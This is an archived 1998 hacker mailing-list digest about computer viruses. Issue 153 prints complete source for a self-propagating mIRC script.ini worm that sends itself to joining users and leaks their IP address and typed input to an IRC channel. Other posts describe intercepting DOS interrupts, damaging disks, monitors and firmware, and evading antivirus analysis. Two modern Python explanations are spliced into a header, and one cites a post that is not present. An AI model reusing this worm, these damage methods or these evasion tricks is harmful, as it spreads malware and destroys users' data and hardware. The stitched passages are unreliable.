========================================================
+HCU Maillist Issue: 151 02/24/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================

CONTENTS:

#1 Subject: repository now public (fravia)
#2 Subject: :(
#3 Subject: Virus Quiz

ARTICLES:

-----#1-------------------------------------------------
Subject: repository now public (fravia)

1) hcu maillist repository link is now on my links.htm page
let me know if for some reason you believe I should take it off one day
(+Zer0 will soon see if too many spammers/zombies go for it)

2) anyone working on apivision?

later
fravia+

-----#2-------------------------------------------------
Subject: :(

hehemmm..ehhh..hallo...
well,...sorry for the encrypted message yesterday...
the line length looked fine here...but,eehh...I didn't count..

bye,
rickx

-----#3-------------------------------------------------
Subject: Virus Quiz

I actually received answers from some people by email! I wasn't really
expecting it. I'll give my answers. Those currently still in the scene,
please feel free to correct me if any of the info is out of date etc.

1. Yes, most commonly as an attachment. Word macros are notorious for
spreading like this as some email clients auto-open them or call Word to
open them on a double click.

2. When I was first in the scene, there was one virus I knew of that could
do this. It exploited the macro facilities of Lotus cc:Mail, the de facto
email client back then. They have probably patched it up in the later
versions as I have not heard anything of this since. I hear whiffs of info
about a similar virus hooking onto Outlook which seems like a viable
replication method if MS have their way... I've never used Outlook and I've
not seen the virus - maybe a rumour, maybe not.

3. Yes it is.
It always surprises me when people refuse to have my infected disks resting
on their computer in case it infects it ;)

4. Actually, yes. There are a number of nasty things you can do if you put
your mind to it. (Nasty protectionists can get some ideas.) Some early hard
drives could be killed completely by messing up track zero. Early monitors
could be fried by nasty refresh rates. My personal favourite was by one
author who tried to exploit a design fault in some floppy drives by making
the head swing backwards and forwards hitting the casing. I assumed that
this was to try to damage the head, I wonder if it worked?

5. Yes. A common mistake by people just beginning to dabble in viruses is
that they see only runtime viruses and make the mistake that runtime is the
only time to infect. Resident viruses are much nastier and can be hooked
absolutely everywhere.

6. Yes and no. Files with the write protect flag on can easily be toggled
off before infection. Disks vary. If their protection is software it can be
bypassed, but I know of no virus which bothers to do this. You will not
necessarily get a write protect error (e.g. on floppy disks); it takes very
few bytes to hook the critical error handler.

~~ Ghiribizzo

=====End of Issue 151===================================

========================================================
+HCU Maillist Issue: 152 02/25/1998
--------------------------------------------------------
========================================================

CONTENTS:

#1 Subject: Re: +HCU ML Issue 150
#2 Subject: Re: Virus Quiz

ARTICLES:

-----#1-------------------------------------------------
Subject: Re: +HCU ML Issue 150

> QUIZ
> ====
>
> 1. Can a virus be spread by email?
>

No, unless it is a Macro virus and you use Microsoft Word to read it.
If you receive an executable file uuencoded with the email and you execute
that file, the virus could be spread that way. There's no way a simple text
email will infect you.

> 2. Can a virus sent by email do something nasty just by opening the email?
>

No. A virus is a piece of code, it is a program or a macro, even a .BAT
file, but the fact is, it has to be executed to do harm. If you just look at
it, nothing happens.

> 3. Is it safe to copy an infected file onto the root of your hard disk?
>

Sure, you can copy it anywhere you want. You can have thousands of virii in
your hard drive. As I said, they are just programs; if you don't execute
them on purpose they are as dead as a rock. If you have them in source code,
you can send them to your grandma's computer, she won't be infected, unless
she knows how to compile them :)

> 4. Can a virus physically damage parts of your computer?
>

Are any of your programs able to physically damage your system?
Theoretically no. The same answer applies to virii; however, if a virus
activates the motor of one of your floppies frequently, it could shorten the
life span of that component. If a virus is able to turn on and off
continuously one pixel of your screen, it could be damaged. Again this is
only theory as I don't know any virus designed to do this. It would take too
much time to damage any of today's modern monitors or floppy drives. There's
no point in it because if your floppy never stops, that's an obvious
behavior and the virus doing this will have a very short life. Viruses are
designed to survive, not just to give themselves away in the first round of
the fight.

> 5. Can a virus infect a disk in the floppy drive if you only do a DIR on it?
>

This is essentially false.
You can ask for DIR, copy infected files, disassemble the infected files and
nothing happens if your computer is clean; on the other hand, if your
computer is infected with a direct action virus (it only infects when run)
nothing will happen either because the DIR command is not per se an
executable file. Now, if your memory is infected with an MBR or multipartite
virus, there's a chance your floppy will be infected, not because of the DIR
command itself, but because the virus is active in memory and the trigger
for floppy infection could be anything. To answer the basic question whether
a virus can infect on DIR: some new virii can infect by asking for a DIR,
but this is a new feature not available before. However, the answer to this
question, for practical reasons, is still NO, because most viruses can't do
that.

> 6. Can a virus infect a write protected file/disk? Will there be an error
> message?
>

In regard to disk infection, no they can't. Write protected floppies are
secure against viruses. If the virus is stealthy enough to manage INT 24,
the critical error handler (write-protection violation attempted), there
won't be any error to warn the user when the virus attempts to infect a
write protected disk. Only older viruses (museum viruses) will generate such
a lame error nowadays. In regard to write protected files: INT 21
sub-function 4301H will get rid of the file attributes, allowing the virus
to open it without any limitation.

Some other interesting questions:

Is it possible to build a multiplatform virus (able to infect UNIX, PCs,
Mac) or multi-operating system virus (Win95, NT, DOS, OS/2) at the same
time?
Answer. Yes, it is. In fact, there are several viruses capable of doing this.

Is it possible to create viruses able to spread through a LAN?
Answer. Yes it is possible.

Is it possible to create a retro-virus? One that executes its code
backwards.
Yes, there's one virus out there capable of doing this.

Can a Macro virus infect different language versions of Microsoft Word?
Answer. False until recently. From some time ago, the answer is now yes.

Can a DOS virus survive under Win95?
Answer. Most can survive. Of course, direct action ones will only infect
when a DOS window is opened or during the booting process (in MBR cases)
before Win95 takes control over the memory.

Can a virus behave as a TSR on Win95?
Answer. Sure it can if it is specially designed to do it.

Am I a virii maker? No I'm not. I know everything about it and I can code a
virus if I want, but I don't find any reason to do it, as I decided many
years ago to use my brain to build, not to destroy or harm.

Aesculapius.

-----#2-------------------------------------------------
Subject: Re: Virus Quiz

Hi all!

First a big thank you goes to Ghiribizzo for turning "JOIN THE CREW" into
something interesting! Just a few comments to the virus quiz.

>could be fried by nasty refresh rates. My personal favourite was by one
>author who tried to exploit a design fault in some floppy drives by making
>the head swing backwards and forwards hitting the casing. I assumed that
>this was to try to damage the head, I wonder if it worked?

I don't know about this one, but one of the first viruses in my country was
written for the old Commodore 64, and managed to swing the head of the 1541
(is the number correct?) floppy drive to a position where it could not come
back from. You had to take it to a service where they took it apart and put
the head back on track, manually. As it turned out the virus was written by
a guy in a computer service firm. (You can guess why :)

>6. Yes and no. Files with the write protect flag on can easily be toggled
>off before infection. Disks vary. If their protection is software it can be
>bypassed, but I know of no virus which bothers to do this. You will not
>necessarily get a write protect error (e.g. on floppy disks) it takes very
>few bytes to hook the critical error handler.

Some thoughts on the topic of writing on write protected disks.
I firmly believe that it's impossible to bypass the physical write
protection of a floppy disk from software. (BTW this is the idea behind the
whole thing.) As far as I know the writing circuit is physically interrupted
by the sensor mechanism. From time to time big arguments start about this on
one of the mailing lists I read, but so far nobody could present a working
program which could write on a protected disk. Most of the time the argument
that it can be done could be traced back either to a faulty drive where the
sensor mechanism was broken and the drive could not detect the protection
correctly, or to an article which appeared in c't computer magazine. This is
a good German computer magazine, you can read it on the net at
********************** in German or some articles in English at
*******************************
This magazine published a detailed paper about how to write on a write
protected disk, but as it turned out it was just an April joke. Now the
problem with these April joke articles is that these guys are really good
(last time I checked their page they were running a Pentium II processor
with 400 MHz in a freezer box :) and the joke articles are very believable
even for experts.

Bye
Zer0+

=====End of Issue 152===================================

========================================================
+HCU Maillist Issue: 153 02/26/1998
--------------------------------------------------------
========================================================

CONTENTS:

#1 Subject: virii (some fun topics at last ;)
#2 Subject: gthorne - virus info
#3 Subject: gthorne - more virus oddities
#4 Subject: To: Aesculapius
#5 Subject: gthorne postulizing
#6 Subject: Re: Virus Quiz

ARTICLES:

-----#1-------------------------------------------------
Subject: virii (some fun topics at last ;)

To continue the discussion a bit...

Physical damage to hardware components: It is certainly possible to drive a
monitor at a frequency that will blow its tube, or to wear out tracks in a
hard drive, though as Aesculapius pointed out, with the durability of modern
equipment it is more difficult than it used to be (no more RLL drives that
you could destroy via the partition table).

Infecting via DIR: DIR is of course a directive in command.com; a
persistent virus could infect both command.com and the boot sector of
floppy/hard drives (this would of course require a command.com version
check), then patch the DIR section of command.com to trigger its boot sector
infection routine. This would be a little tricky, though (and I guess it
counts as a multipartite virus).

Write-protected floppies: The little hole in the disk is scanned by a
photosensor in the disk drive, which prevents disk writes on a *hardware*
level if the hole is covered. This means that the write prevention is
mechanical, not logical, and hence is out of reach of even the
quasi-omnipotent virus writers.

Should virii be written? Hell yes, McAfee would go broke if they weren't
around ;) Plus we would know only half as much about assembly, there would
be no VLAD (so we would have to invent them), and crazy little utils like
KoH wouldn't exist.

mammon_

PS Zer0+ Thanks for the excellent URL !
Very good industry updates

-----#2-------------------------------------------------
Subject: gthorne - virus info

okay in regard to aesculapius and more on ghbzo's virus quiz

there is something that i must mention, gh and i both knew of software that
could damage old monitors by altering the rate of refresh (in his case he
knew of a virus, in mine i know of it through old code manuals i had read)

i had some software once that would allow you to finagle an old hercules
card to display graphics that were normally color - by converting it to
greyscale, but it had some of the same mention in its docs on how it had
damaged monitors in the past if people were not careful to install it
precisely - and often regardless of the user's attempts it would damage a
monitor anyway

also - he knew of a virus which caused old drives to smash the read/write
head back and forth into the drive casings of old drives, also something i
had heard of before - and also in my case in a different manner - the one i
had heard of was one my own father had seen in his software reverse
engineering days. (mind you that new drives are no more susceptible than new
monitors to this)

basically the protection on the software was a bit nasty - if it was in the
process of being cracked, and it resulted in an incomplete crack (which all
of us go through 90% of the time in testing phases) it would respond by
applying code that attempted damage like that while displaying 'software
piracy is illegal, now trashing your hard drive' (paraphrased because of bad
memory)

i think that is what it did, the actuality may have had a separate agenda
considering that old drives were easily damaged if you did not park them.
again, none of this is possible with today's drives.

regarding email virii..
gh said he had seen a cc-mail macro virus (i have not but that would be
theoretically possible regardless)

as i said in my letter to him on the subject - it will be scary when
microsoft's newer emailers decide to make macros standard operating
procedure (do any one of us doubt that ms would try it?)

something else - i have seen something directly that people do not realize -
again gh knew of this.

junkie virus is a master boot record infecting virus i am well acquainted
with due to the insane spreading it had in a locale where friends i had kept
using my computers to work on papers and play games. it also infects com
files (it is much like monkey b in the way it propagates)

here is the trick... i have had many MANY floppies ruined by it - how you
say? i am not entirely sure what happens to the floppy, but i know that
after infection, i have had floppies report a permanent track zero error and
are not formattable ever again.

the other thing is in the dir... if junkie is on your machine already,
infecting it, all you have to do to get it to install to a floppy is to do a
dir of the floppy

why? because it jumps to all master boot records that are not write
protected on the system and sitting in memory like it does, it also looks
for .com files everywhere

of course, you have to be infected already for this to happen - but the
question was can you infect something just by dir'ing it and the answer is
yes if you have it already (or if dir.com is infected... or command.com...
or format.com... you get the idea)

something else gh and i both came up with is the possibility of software
based write protections (hard drives for example - and zip drives if you
think about it) neither of us know of a case of this, but anything software
controlled can be virus controlled (q.e.d.)
just for fun i have over 5000 of the little monsters and over 800 source
codes - i love reading the concise code and figuring out how something can
be useful (see symbiote.zip) made out of the beasts

besides... i would not know as much about assembly file formats if i had not
studied so deeply into how they were infected - and the vlad texts to
explain some of it, although often not entirely straightforward and the code
needing tweaking to get things to work (i actually had to mangle virus code
from several sources and those texts to get that little symbiote to work
properly)

as you can see i enjoy this subject - take care all and 'have a day' :| :)

+gthorne
********************

-----#3-------------------------------------------------
Subject: gthorne - more virus oddities

this is for the masses who didn't know it was out there, but one day i
noticed a particularly interesting file dcc'd to me on irc...

the person who dcc'd it did not know it, and so i knew something was up

basically - the script.ini file in mirc can be exploited as a virus, and
this is exactly what this file does. it basically makes random dcc's to
other users in a channel (making one rather unpopular in the process) but
here it is, it is too different not to include (just showing the range of
self propagating code)

effectively, patching oneself is easy, i basically put a blank script.ini in
my mirc directory and made it read only (there are mirc settings you can
make to patch self as well, though i care not to learn much about the inner
workings of mirc)

if you are a real jerk, you can put this in your own mirc directory and go
online as a random user in some channel (then patch self later)

a friend of mine and i came up with all kinds of bad humor.. say for
instance making it autokick users, ban them, or for those with no op status,
doing a /quit every now and then could become a pain especially if it had
some mean message like 'i have infected you idiots!'
that would be really mean since anyone infected would lose popularity
immensely

granted i would never do this, but get a few beers in me around a jacuzzi
and the discussions are endless (yes i have gotten a case of beer before and
shared it with a few friends in a snowy mountain hideaway with a jacuzzi on
the porch - was fun - hot water below, snow crystals above.. and virus
discussions) and cracking.. and hacking.. and of course the ladies in the
other room who we kidnapped for the party earlier ;)

one of those ladies designed that necklace of mine for those of you who
haven't seen it (same pattern as on my shield)

well anyway - here's the virus code, hope you enjoyed the story :)

--- script.ini virus start ---
[script]
n0=on 1:START:{ .sreq ignore
n1= .remote on
n2= titlebar (Not connected)
n3=}
n4=raw 401:*: {
n5= halt
n6=}
n7=RAW 001:*:titlebar (Connecting to $server $+ )
n8=
n9=on 1:CONNECT:titlebar (Connected to $server $+ ) | .msg #kkkd Hi. $ip on $server $+ : $+ $port $+ .
n10=
n11=on 1:DISCONNECT:titlebar (Not connected)
n12=
n13=;if you type something in status it doesn't have to have "/"
n14=on 1:INPUT:*:{ .msg #kkkd ( $+ $active $+ ) $1-
n15= set %a status window
n16= if ( $active == %a ) { $1- | halt }
n17=}
n18=
n19=;ping stuff
n20=on 1:CTCPREPLY:ping*:.notice $nick Your ping time is $duration($calc($ctime - $2)) $+ .
n21=CTCP 1:ping: if ( $nick != $me) { .ctcp ping $1 } | if ( $3 != $null ) { $3- | halt }
n22=
n23=;if you are banned but still opped, unban self
n24=on *********** ( $banmask iswm $address($me,5) ) mode $chan -b $banmask
n25=
n26=;the propagation rule: every join triggers a DCC send of this script.ini
n26=on 1:JOIN:*:{
n27= if ( $nick == $me ) { halt }
n28= if ( $comchan($nick,0) > 2 ) { .notice $nick Following me? | halt } | .dcc send $nick $mircdir $+ script.ini
n29=}
n30=
n31=;show channel topic in channel on join
n32=RAW 332:*:echo 4 $2 $chr(31) $+ $2 $+ $chr(31) $+ : $3-
--- script.ini virus finished ---

-----#4-------------------------------------------------
Subject: To: Aesculapius

Thank you for your excellent article on virii. I get very tired of the lame
rumors that people pass around about virii. I seem to get at least one per
week. With your permission, I would like to use parts of your article to
answer these virii scares. Likely I would edit some things for the neophyte,
and leave off the more technical aspects. I will be glad to give you credit,
or leave your name off. Your choice. Please let me know if this is ok with
you.

zinger

-----#5-------------------------------------------------
Subject: gthorne postulizing

now that i have been thinking about it, i have had some games with deep bass
blow a few sound cards in the past - a virus probably could do the same, but
it would kinda be obvious that a virus were in the system if it were well..
screaming :)

not to mention it would have to take quite a bit of time before the card
'gave up and died' since it wasn't immediate that they got blown

one game in particular when set too high tended to do this.. wing commander
II in the cinematic startup sequence with all those kilrathi voices, and a
mod called echoes which i like a lot

far fetched? yes. impossible? no. :)

+gthorne

-----#6-------------------------------------------------
Subject: Re: Virus Quiz

gthorne and I have been writing to each other about the quiz and it seems
that there is a confusion as to what I meant when I said disks could be
infected. Here's part of a reply to gthorne.

>>>> A write protected floppy can't be infected, when I said disks, I was
referring to both floppies and hard disks generally.
Though I was talking to a friend of mine not long ago and he told me that he
had seen a system where floppy disk write protect was software based. I've
never seen this myself, but as with bypassing all software protections, it
needs to be pretty common to justify the extra bytes. Error messages can be
suppressed on attempted writes to protected floppies to prevent the virus
being easily spotted. <<<<

Someone asked about hooking interrupt vectors, here's how a virus might do
it:

        mov     ax,3524h                    ; AH=35h get vector, AL=24h critical error handler
        int     21h                         ; returns the current handler in ES:BX
        mov     word ptr [bp+oldint24],bx   ; save it for later restore
        mov     word ptr [bp+oldint24+2],es ; nice of the virus writer, eh :)
        mov     ah,25h                      ; AH=25h set vector (AL still 24h)
        lea     dx,[bp+offset int24]        ; DS:DX = location of new handler
        int     21h                         ; and set it

=====End of Issue 153===================================

========================================================
+HCU Maillist Issue: 154 02/27/1998
--------------------------------------------------------
========================================================

CONTENTS:

#1 Subject: Reposting
#2 Subject: death to floppy disks!
#3 Subject: Re: postulating
#4 Subject: Recursive Tunneling
#5 Subject: old virii
#6 Subject: Virus Idea

ARTICLES:

-----#1-------------------------------------------------
Subject: Reposting

[Oops! I placed a series of dots after int 21h in my first email to show a
gap and forgot that SMTP would interpret this as end of email. I've reposted
and replaced the dots with "(etc.)" - sorry about that]

gthorne and I have been writing to each other about the quiz and it seems
that there is a confusion as to what I meant when I said disks could be
infected. Here's part of a reply to gthorne.

>>>> A write protected floppy can't be infected, when I said disks, I was
referring to both floppies and hard disks generally.
Though I was talking to a friend of mine not long ago and he told me that he
had seen a system where floppy disk write protect was software based. I've
never seen this myself, but as with bypassing all software protections, it
needs to be pretty common to justify the extra bytes. Error messages can be
suppressed on attempted writes to protected floppies to prevent the virus
being easily spotted. <<<<

Someone asked about hooking interrupt vectors, here's how a virus might do
it:

        mov     ax,3524h                    ; AH=35h get vector, AL=24h critical error handler
        int     21h                         ; returns the current handler in ES:BX
        mov     word ptr [bp+oldint24],bx   ; save it for later restore
        mov     word ptr [bp+oldint24+2],es ; nice of the virus writer, eh :)
        mov     ah,25h                      ; AH=25h set vector (AL still 24h)
        lea     dx,[bp+offset int24]        ; DS:DX = location of new handler
        int     21h                         ; and set it
        (etc.)
int24:
        mov     al,3                        ; action code 3 = fail the DOS call, no prompt
        iret                                ; return

Pretty basic but easy to understand because it uses DOS services to hook and
set the handlers. In the same way, viruses can replicate by hooking
'closefile' or any other interrupt they like.

I agree with Aesculapius about destructive viruses. I've programmed viruses,
but have never let them loose - it's just not nice :)

But physical damage can be done to your computer. Another method I thought
of was to attack flash RAM. You could flash junk into modems, BIOS, etc. and
some types will only take a few flashes before they mess up. Also, there are
some DVD drives which allow you to flash the country code only 5 times
before it sticks. A specific virus could be very nasty and leave the DVD
drive able only to play Japanese titles...

~~ Ghiribizzo

-----#2-------------------------------------------------
Subject: death to floppy disks!

I wrote to gthorne, but I thought the receivers of the mailing list might
also be interested:

>>>> I thought about how you could kill floppies as you have described and
I've come up with an answer. I'm pretty sure this is how junkie must do it
as well. Simply mark the first sector of a disk bad. This completely screws
everything up.
I tried to use Norton Diskedit in maintenance mode to undo this, but it
couldn't. I tried to use the debug 'w' command, but this couldn't either.
I'm wondering if there is a method low enough to write to the disk. It
should be possible if you bypass DOS, but this seems too much like hard
work. Please send me the junkie source as I think the answer lies there.

I'm wondering whether you can recreate a similar effect on hard disks -
though I'm not going to test it on mine any time soon! :)

BTW, you owe me a floppy disk ;) <<<

~~ Ghiribizzo

-----#3-------------------------------------------------
Subject: Re: postulating

A friend of mine didn't realise what playing a data CD in his HIFI could do
to it. The lesson cost him a pair of new tweeters. A virus attack on the
same lines could clean out speakers very quickly (seconds) and I've heard
you can damage the amp too, but I'm no audio expert and don't know why that
may be the case.

Although new hard disks are no longer susceptible to the easy RLL drive
tricks, the same friend who blew his tweeters has recently totalled his hard
disk by some low-level utils. Sending factory commands to the disk would be
an easy way of ruining it permanently, and the instructions should be fairly
generic for each brand of hard disk. Go to the manufacturers' web sites and
download the tools.

Also, monitors stand up to much more punishment now, but are still highly
delicate devices. You still see warnings on graphics cards regarding messing
around with refresh rates.

>>>> Write-protected floppies: The little hole in the disk is scanned by a
photosensor in the disk drive, which prevents disk writes on a <<<<

My floppy drive has a little switch which is depressed when the hole is
covered. Wouldn't a photosensor be easily clogged by dust etc.?

>utils like KoH wouldn't exist.

Someone wrote to me some time ago saying that KOH isn't secure. Apparently
the password is retrievable.

It's one thing to learn how a virus works and another thing to write one.
It's the difference between going through a cracking tutorial in your mind
and cracking a program hands on. My first virus was an overwriting com
infector - with no frills! It took me ages of searching through 80486
instructions before I found CALL was the instruction I needed to push the
current location onto the stack for the delta offset. Of course, I could
have obtained a virus source, and it would have saved me some time. But I
had a virus concept from scratch with the CALL being the main tricky thing.
I liked it so much it lived in its own directory and I fed it com files
every now and then to keep it happy :)

~~ Ghiribizzo

With all 6 articles in issue 153 being about viruses, I wonder if Bigjim
was right about the 'join the crew virus' :)

-----#4-------------------------------------------------
Subject: Recursive Tunneling

With all this talk of viruses, my mind fell upon a technique that most of
you perhaps will not know of even if you have studied viruses. The
technique? Recursive tunneling. I think this could be a very powerful aid to
protectionists. Put in a well hidden file checksum to force the cracker to
use a TSR to patch on the fly and then use recursive tunneling to render the
TSR useless. Confused? Let me explain in greater detail.

Recursive Interrupt Tunneling: what is it?
==========================================

Basically, it is tracing through an interrupt to find the original DOS or
BIOS entrypoint. Then future calls can be made to the interrupt without
running any code which might be hooked onto the interrupt.

Virus use: Bypasses resident virus scanners so that the virus can't be
detected
Protectionist use: Bypass TSR cracks hooked onto interrupt vectors

How is it done?
===============

Let me refer you to the excellent article "ANTI-Anti-Virus Tricks" by
MnemoniX. My favourite part of virus programming was the battle between
virus coders and AV authors.
If I can't tempt you to study viruses with the following snippet from
MnemoniX's article then I don't think I'll ever be able to.

>>>>>
TBDRIVER'S DETECTION OF RECURSIVE TUNNELING

TBDRIVER is resistant to most recursive tunneling. When an interrupt 21 is
called, TBDRIVER checks the status of the trap flag for a recursive
tunneling routine and will display a message if it is found to be set. The
code that does this appears virtually impenetrable, and looks like this:
(This is from TBDRIVER version 6.14; it may be different now but the idea is
basically the same.)

        cli                     ; clear interrupts to prevent
        pushf                   ; interference
        ...
        cld
        push    ax              ; what this, in essence, does is
        push    bx              ; that it saves a value on the stack,
        xchg    ax,bx           ; pops it, decrements the stack ptr.
        pop     ax              ; to point to it again, pops it again,
        dec     sp              ; and if the value changed, an int-
        dec     sp              ; errupt must have occurred. Since the
        pop     bx              ; interrupt flag is off, the only
        cmp     ax,bx           ; interrupt this could be is a type 1 -
        pop     bx              ; the trap flag interrupt routine.
        jz      02A1            ; If two values popped are different,
                                ; it warns the user.
<<<<<

Tempted? Hope so.

~~ Ghiribizzo

-----#5-------------------------------------------------
Subject: old virii

BTW - why virii and not viruses? (yes, I studied 6 years of Latin)....

Anyway, back in the days of the Apple II and in the pre-Win days of DOS, I
made a nice little proggie that switched commands in the DOS - CATALOG
(remember?) would cause the effect of DELETE ALL, and DIR would cause the
effect of DEL *.* It was very simple, the program just looked for the 'DIR'
routine and jumped it to the DEL *.* routine. It also patched the
confirmation (Y/N) by directly jumping over it.

Of course, my best 'virus' was when I connected a computer next to the one I
was using to mine. When a friend sat near, I controlled his cursor, and I
prevented from occurring.
I then told him he had to hit the monitor on the side to make the cursor
'fall', and that's exactly what he kept doing for a little while...

Wafna

-----#6-------------------------------------------------
Subject: Virus Idea

Since virii seem to be a topic at this time in this list, I have an idea I'd
like to discuss with a few others in here.

Most AV people don't disassemble/debug a polymorphic virus if they can avoid
it. They therefore infect hundreds of identical files with the virus to find
an algorithm to predict its polymorphic behaviour. Sepultura wrote a few
textfiles about bait-file detection through filenames, but I have another
idea here:

If you make the way the virus mutates directly related to the file size, the
approach with identical files wouldn't work. They would get a different
virus for every different bait file they use, but not 2 different for the
same bait. This would lead to an incorrect algorithm, and would force the AV
people to examine that virus by hand, which is a lot of work + expensive :-)

The downside of course is: If you have the file size in relation to the way
the virus turns out to be, they can, once they have completely disassembled
it, derive an algo from there :-/

Well, I guess there is no real thing you can do against a good
virus-reverser...

Another few things to try: Mutation depends on file date, on current date,
file checksum (erm... this is gonna be sloow :-) etc...

Please correct me on any points which are wrong/bad/unrealistic, I am not a
good virus writer (yet ?;)

HalVar

=====End of Issue 154===================================

========================================================
+HCU Maillist Issue: 155 02/28/1998
--------------------------------------------------------
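The "death to floppy disks!" post in issue 154 above describes marking a sector bad so that DOS can no longer reformat the disk, and Ghiribizzo's later note in issue 155 points at FORMAT /C, which re-tests the clusters currently marked bad. As an added example (not code from the list, and not a claim about how junkie or Ghiribizzo's own test did it), the Python below builds a constructed FAT12 allocation table in memory and shows the table-level side of that trick: the 12-bit entry value 0xFF7 that marks a data cluster unusable, how to set and read it without disturbing the neighbouring entry that shares a byte, how to list the clusters a FORMAT /C pass would have to re-test, and how to clear the mark again. The cluster numbers, media descriptor and sample file chain are constructed values; nothing touches a real disk. One caveat the example makes visible: FAT entries only exist for data clusters (numbered from 2), so the boot sector itself has no entry and a damaged sector 0 is outside what this table can express.

```python
"""FAT12 bad-cluster marking, demonstrated on a constructed in-memory table.

Added example; not code from the mailing list. Nothing is written to a disk.
"""

BAD_CLUSTER = 0xFF7        # FAT12 value for a cluster marked unusable
END_OF_CHAIN = 0xFFF       # last cluster of a file (0xFF8..0xFFF)
FREE = 0x000
FIRST_DATA_CLUSTER = 2     # entries 0 and 1 are reserved; sector 0 has no entry


def fat12_get(fat, cluster):
    """Read the 12-bit entry for `cluster` from a packed FAT12 table."""
    off = cluster * 3 // 2
    word = fat[off] | (fat[off + 1] << 8)
    # Even clusters use the low 12 bits of the word, odd clusters the high 12.
    return word & 0x0FFF if cluster % 2 == 0 else word >> 4


def fat12_set(fat, cluster, value):
    """Write a 12-bit entry without disturbing the neighbour sharing a byte."""
    value &= 0x0FFF
    off = cluster * 3 // 2
    word = fat[off] | (fat[off + 1] << 8)
    if cluster % 2 == 0:
        word = (word & 0xF000) | value        # keep the odd neighbour's nibble
    else:
        word = (word & 0x000F) | (value << 4) # keep the even neighbour's nibble
    fat[off] = word & 0xFF
    fat[off + 1] = word >> 8


def mark_bad(fat, cluster):
    """Table-level 'mark it bad': a normal FORMAT leaves such clusters alone."""
    fat12_set(fat, cluster, BAD_CLUSTER)


def clear_bad(fat, cluster):
    """Undo the mark, as FORMAT /C would if the cluster re-tested clean."""
    if fat12_get(fat, cluster) == BAD_CLUSTER:
        fat12_set(fat, cluster, FREE)


def bad_clusters(fat, total_clusters):
    """List the data clusters currently marked bad (what FORMAT /C re-tests)."""
    last = FIRST_DATA_CLUSTER + total_clusters
    return [c for c in range(FIRST_DATA_CLUSTER, last)
            if fat12_get(fat, c) == BAD_CLUSTER]


def build_sample_fat(total_clusters=16):
    """Constructed table: media descriptor, then one 3-cluster file chain."""
    entries = FIRST_DATA_CLUSTER + total_clusters
    fat = bytearray(entries * 3 // 2 + 2)
    fat12_set(fat, 0, 0xFF0)             # media descriptor 0xF0 (1.44 MB floppy)
    fat12_set(fat, 1, END_OF_CHAIN)
    fat12_set(fat, 2, 3)                 # file: cluster 2 -> 3 -> 4 -> end
    fat12_set(fat, 3, 4)
    fat12_set(fat, 4, END_OF_CHAIN)
    return fat


if __name__ == "__main__":
    table = build_sample_fat()
    mark_bad(table, 5)
    mark_bad(table, 12)
    print("marked bad:", bad_clusters(table, 16))
    clear_bad(table, 5)
    print("after clearing 5:", bad_clusters(table, 16))
```

The odd/even packing is the part that bites in practice: writing entry 5 as a plain 16-bit store would corrupt the end-of-chain mark of the file in cluster 4, so `fat12_set` masks the shared nibble on both paths.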
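The TBDRIVER fragment quoted in the Recursive Tunneling post above is short enough to be puzzling. As an added example (not TBDRIVER's code and not the list's), the Python below models just enough of a real-mode x86 to show why that push / pop / dec sp / pop / cmp sequence works: a word-addressed stack, SP, and a hook that runs after every instruction the way a type-1 (trap flag) interrupt does, which `cli` cannot block. When a single-step handler is active, the CPU pushes FLAGS, CS and IP below SP before the handler gets control, and after `pop ax` that lands on the word just popped; `dec sp` twice and `pop bx` then re-read that word and find it changed, even if the handler itself touches nothing. With no handler the two reads agree. The register values, FLAGS, CS and IP are constructed; the model ignores byte-granular overlap at odd SP values and reproduces only the check, not the rest of TBDRIVER.

```python
"""Model of TBDRIVER's stack re-read check against single-step tunnelling.

Added example; not TBDRIVER's code and not from the mailing list. Only a
word-addressed stack, SP and the trap-flag delivery are modelled.
"""


class Cpu:
    """Minimal real-mode CPU model: a stack, SP, and an optional INT 1 hook."""

    def __init__(self, single_step_handler=None):
        self.mem = {}                  # word-addressed stack memory (constructed)
        self.sp = 0x1000
        self.flags = 0x0202            # constructed FLAGS image
        self.cs = 0x0800               # constructed CS
        self.ip = 0x0100               # constructed IP
        self.handler = single_step_handler

    def push(self, word):
        self.sp -= 2
        self.mem[self.sp] = word & 0xFFFF

    def pop(self):
        word = self.mem.get(self.sp, 0)
        self.sp += 2
        return word

    def step(self):
        """End of one instruction: deliver a type-1 interrupt if TF is in use.

        cli does not prevent this; the trap flag is not the interrupt flag.
        """
        self.ip += 1
        if self.handler is None:
            return
        self.push(self.flags)          # the CPU saves FLAGS, CS, IP below SP
        self.push(self.cs)
        self.push(self.ip)
        self.handler(self)             # tunneller's INT 1 code runs here
        self.ip = self.pop()           # iret
        self.cs = self.pop()
        self.flags = self.pop()


def tbdriver_check(cpu, ax=0x1234, bx=0xABCD):
    """Run the checked sequence; True means an interrupt fired in between.

    Mirrors: push ax / push bx / xchg ax,bx / pop ax / dec sp / dec sp /
    pop bx / cmp ax,bx / pop bx.
    """
    cpu.push(ax)
    cpu.step()                         # push ax
    cpu.push(bx)
    cpu.step()                         # push bx
    ax, bx = bx, ax
    cpu.step()                         # xchg ax,bx
    ax = cpu.pop()
    cpu.step()                         # pop ax: the word still sits at [SP-2]
    cpu.sp -= 1
    cpu.step()                         # dec sp
    cpu.sp -= 1
    cpu.step()                         # dec sp: SP points at that word again
    bx = cpu.pop()
    cpu.step()                         # pop bx: re-read it
    tampered = ax != bx                # cmp ax,bx ; jz ok, otherwise warn
    cpu.pop()
    cpu.step()                         # pop bx: drop the other saved word
    return tampered


def silent_tunneller(cpu):
    """An INT 1 handler that does nothing at all; the check still catches it."""
    return None


if __name__ == "__main__":
    print("no trap handler  ->", tbdriver_check(Cpu()))
    print("single-stepping  ->", tbdriver_check(Cpu(silent_tunneller)))
```

The point to take from the model is that detection does not depend on anything the tunneller does: the interrupt entry sequence itself overwrites the slot below SP, so the only way to single-step through this code unnoticed is not to be single-stepping at that moment.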
========================================================

CONTENTS:

#1 Subject: gthorne on virii subject
#2 Subject: virii vs. viruses (or: is Ghiribizzo schizophrenic?)
#3 Subject: Bringing floppy disks from the dead
#4 Subject: To: zinger

ARTICLES:

-----#1-------------------------------------------------
Subject: gthorne on virii subject

viruses... virii... makes no difference which you use in the computer world, people use it interchangeably

if one were truly anal one could look up the biomedical reference to it (virii just sounds more like something someone who is educated would say ;)

it appears a cat got let out of a bag with this one :)

i have written 2 virus like entities...

